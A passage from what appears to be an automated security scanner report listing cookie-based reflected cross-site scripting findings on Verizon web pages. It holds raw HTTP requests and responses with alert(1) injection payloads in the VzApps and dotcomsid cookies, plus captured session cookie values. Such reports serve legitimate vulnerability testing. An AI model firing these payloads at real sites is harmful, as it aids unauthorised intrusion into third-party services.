RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102485
Expires: Sat, 20 Nov 2010 02:56:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=TXdcef1'><script>alert(1)</script>614ae10fb65; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXDCEF1'><SCRIPT>ALERT(1)</SCRIPT>614AE10FB65 ' />
...[SNIP]...

3.279. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload c9efe<script>alert(1)</script>6775dca418 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXc9efe<script>alert(1)</script>6775dca418; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102479
Expires: Sat, 20 Nov 2010 02:56:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:41 GMT; path=/
Set-Cookie: ContextInfo_State=TXc9efe<script>alert(1)</script>6775dca418; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:41 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC9EFE<SCRIPT>ALERT(1)</SCRIPT>6775DCA418 </DIV>
...[SNIP]...

3.280. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb6fd"-alert(1)-"6d30b2026af was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=bb6fd"-alert(1)-"6d30b2026af; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 108514
Expires: Sat, 20 Nov 2010 02:56:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "bb6fd"-alert(1)-"6d30b2026af"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: docu
...[SNIP]...

3.281. https://www22.verizon.com/Residential/FiOSTV/Check_Availability/Check_Availability.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Check_Availability/Check_Availability.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d6663'><script>alert(1)</script>7127b0cbbb7 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Check_Availability/Check_Availability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXd6663'><script>alert(1)</script>7127b0cbbb7; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58577
Expires: Sat, 20 Nov 2010 02:52:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:52:21 GMT
Connection: close
Set-Cookie: ContextInfo_LoopQual=; path=/
Set-Cookie: ContextInfo_State=TXd6663'><script>alert(1)</script>7127b0cbbb7; path=/


<html xmlns:vz>
<head id="_ctl0_head"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><title>
   Verizon | FiOS TV Availability
</title>
<style>
.channel_list .essent
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD6663'><SCRIPT>ALERT(1)</SCRIPT>7127B0CBBB7 ' />
...[SNIP]...

3.282. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 3c7ba<script>alert(1)</script>61b8323e3a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX3c7ba<script>alert(1)</script>61b8323e3a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; 